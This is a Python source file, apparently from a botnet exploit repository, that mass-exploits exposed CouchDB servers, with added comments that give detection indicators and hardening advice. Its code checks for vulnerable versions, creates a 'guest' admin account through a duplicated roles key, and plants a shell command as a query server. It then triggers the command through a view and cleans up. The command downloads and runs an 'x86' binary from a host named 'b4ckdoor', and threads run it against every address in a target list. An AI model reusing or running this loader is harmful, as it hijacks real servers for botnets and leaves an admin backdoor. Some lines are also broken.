R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/Exploits/COUCH DB/couchdb.py
1
#!/usr/bin/env python
2
from requests.auth import HTTPBasicAuth
3
import random
4
import requests
5
import re
6
import sys
7
from threading import Thread
8
from time import sleep
# Target list: every line of the file named by the first command-line argument
# is later handed to exploit() as one host.
ips = open(sys.argv[1], "r").readlines()
12
# Fixed pool of database names; exploit() picks one at random per target and
# creates it on the remote server.
# Defender note: a request that creates or deletes a database with one of these
# literal names is a direct indicator that this script was pointed at the host.
Rdatabases = ["/a564r6fusmg","/dyejdffyjdxryj","/esreghsrgfbgrsb","/sfafdbsrdgjqef","/fyukddyuodyj","/yfjdued6yjdsza","/wefrhnwgerhgsrh","/sfdrebwbef","/fdfgffrgfdsg"]
# Fetches the document at the base URL passed in and returns its "version" field.
# Defender note: this is the script's fingerprinting step. An unauthenticated GET
# of the server root followed within moments by writes to /_users or to the
# query_servers configuration is the request sequence this file produces.
def getVersion(ip):
15
version = requests.get(ip).json()["version"]
16
return version
# Per-target routine of a mass-exploitation loader for CouchDB on TCP 5984.
# In order, it: reads the server version, registers a user document carrying an
# "_admin" role, stores a shell command as a query server named "cmd", creates a
# scratch database, requests a view in language "cmd", then deletes the scratch
# database and the config entry.
# The comments added below are written for detection and hardening: each step is
# one HTTP request that shows up in CouchDB or reverse-proxy access logs.
# Hardening that applies to every step: do not expose port 5984 to untrusted
# networks, require authenticated server admins, and run a release newer than
# the versions accepted by the check further down.
def exploit(ip):
19
global Rdatabases
20
try:
21
try:
22
# All four option branches assign the same command (the "-x" string only adds a
# trailing space): fetch a file named x86 from the host written as "b4ckdoor"
# into /tmp, make it executable and run it.
# Defender note: host-side indicators are wget/curl spawned by the CouchDB
# service account, a new executable under /tmp, and chmod 777 on it.
if sys.argv[2] == "-r":
23
cmd = "cd /tmp; wget http://b4ckdoor/x86; curl wget http://b4ckdoor/x86 -O; chmod 777 x86; ./x86 root;"
24
elif sys.argv[2] == "-c":
25
cmd = "cd /tmp; wget http://b4ckdoor/x86; curl wget http://b4ckdoor/x86 -O; chmod 777 x86; ./x86 root;"
26
elif sys.argv[2] == "-w":
27
cmd = "cd /tmp; wget http://b4ckdoor/x86; curl wget http://b4ckdoor/x86 -O; chmod 777 x86; ./x86 root;"
28
elif sys.argv[2] == "-x":
29
cmd = "cd /tmp; wget http://b4ckdoor/x86; curl wget http://b4ckdoor/x86 -O; chmod 777 x86; ./x86 root; "
30
elif not sys.argv[2]:
31
print "NOT ENOUGH ARGUMENTS!"
32
sys.exit(0)
33
except SyntaxError as e:
34
print "\n Options: (-r|-c|-w|-x)"
35
# One name from the fixed Rdatabases pool is used as the scratch database.
db_ = random.choice(Rdatabases)
36
db = db_
37
# The target line is turned into a plain-HTTP base URL on port 5984.
ip = ip.rstrip("\n")
38
ip = "http://"+ip+":5984"
39
version = getVersion(ip)
40
#print("[*] Detected CouchDB Version " + version)
41
# Version gate: the dots are stripped and the digits compared as one integer.
# Only 1.x with digits <= 170 and 2.x with digits < 211 continue; any other
# reported version makes the routine stop for this host.
# Defender note: a server reporting a release newer than these bounds is outside
# the set this script acts on; confirm the deployed version against the vendor's
# advisories rather than against this check alone.
vv = version.replace(".", "")
42
v = int(version[0])
43
if v == 1 and int(vv) <= 170:
44
version = 1
45
elif v == 2 and int(vv) < 211:
46
version = 2
47
else:
48
#print("[-] Version " + version + " not vulnerable.")
49
sys.exit()
50
with requests.session() as session:
51
#print("[*] Attempting %s Version %d"%(ip,v))
52
session.headers = {"Content-Type": "application/json"}
53
54
# Step 1: user registration, sent before any credentials are set on the session.
# The JSON body names the user "guest", password "guest", and contains the
# "roles" key twice: first ["_admin"], then [].
# Defender note: alert on a PUT to /_users/org.couchdb.user:* from a client that
# is not an administrator, and on user documents whose body repeats a key.
# Nothing later in this routine deletes this user document, so an account
# guest/guest in _users remains as an indicator of compromise after the run.
try:
55
payload = '{"type": "user", "name": "'
56
payload += "guest"
57
payload += '", "roles": ["_admin"], "roles": [],'
58
payload += '"password": "guest"}'
59
60
pr = session.put(ip + "/_users/org.couchdb.user:guest",
61
data=payload)
62
63
#print("[+] User guest with password guest successfully created.")
64
except requests.exceptions.HTTPError:
65
sys.exit()
66
# From here on every request carries HTTP Basic credentials guest/guest.
session.auth = HTTPBasicAuth("guest", "guest")
67
# Step 2: the shell command is written, as a JSON string, to a configuration key
# named query_servers/cmd (under /_config on the 1.x branch, under /_node/ on
# the 2.x branch, which first reads /_membership).
# Defender note: a write to any query_servers key over the network is a
# high-signal event; audit configuration changes and keep the configuration
# API reachable only from administrative hosts.
try:
68
if version == 1:
69
session.put(ip + "/_config/query_servers/cmd",
70
data='"' + cmd + '"')
71
#print("[+] Created payload at: " + ip + "/_config/query_servers/cmd")
72
else:
73
host = session.get(ip + "/_membership").json()["all_nodes"][0]
74
session.put(ip + "/_node/" + ip + "/_config/query_servers/cmd",
75
data='"' + cmd + '"')
76
#print("[+] Created payload at: " + ip + "/_node/" + host + "/_config/query_servers/cmd")
77
except requests.exceptions.HTTPError as e:
78
sys.exit()
79
80
# Step 3: the scratch database is created and a document "zero" with
# _id "HTP" is stored in it.
try:
81
session.put(ip + db)
82
session.put(ip + db + "/zero", data='{"_id": "HTP"}')
83
except requests.exceptions.HTTPError:
84
sys.exit()
85
86
# Execute payload
# Step 4: a view with "language": "cmd" is requested (a temporary view on the
# 1.x branch, a design document "_design/zero" on the 2.x branch). The script's
# own message below treats this request as the point where the command runs.
# Defender note: a view or design document whose language is not one the
# deployment actually uses should be treated as suspicious.
87
try:
88
if version == 1:
89
session.post(ip + db + "/_temp_view?limit=10",
90
data='{"language": "cmd", "map": ""}')
91
else:
92
session.post(ip + db + "/_design/zero",
93
data='{"_id": "_design/zero", "views": {"god": {"map": ""} }, "language": "cmd"}')
94
print("[+] Command executed: " + cmd)
95
except requests.exceptions.HTTPError:
96
sys.exit()
97
98
#print("[*] Cleaning up.")
99
100
# Cleanup database
# Defender note: the scratch database is removed again, so its absence after the
# fact proves nothing; rely on request logs for the PUT/DELETE pair.
101
try:
102
session.delete(ip + db)
103
except requests.exceptions.HTTPError:
104
sys.exit()
105
106
# Cleanup payload
# Defender note: the query_servers entry is also deleted, so a clean
# configuration after the fact does not rule out an earlier run of this script.
107
try:
108
if version == 1:
109
session.delete(ip + "/_config/query_servers/cmd")
110
else:
111
host = session.get(ip + "/_membership").json()["all_nodes"][0]
112
session.delete(ip + "/_node" + host + "/_config/query_servers/cmd")
113
except requests.exceptions.HTTPError:
114
sys.exit()
115
# Every exception is discarded here, so the script prints nothing for hosts where
# a step fails; silence on the operator's side is not evidence for defenders.
except:
116
pass
117
# Driver loop: starts one thread running exploit() for every line of the target
# file, pausing 0.001 s between starts; the threads are not joined here.
# Defender note: on the network this appears as a burst of connections to
# TCP 5984 across many addresses from one source, which rate-based or
# scan-detection rules on that port can catch.
for ip in ips:
118
try:
119
hoho = Thread(target=exploit, args=(ip,))
120
hoho.start()
121
sleep(0.001)
122
except:
123
pass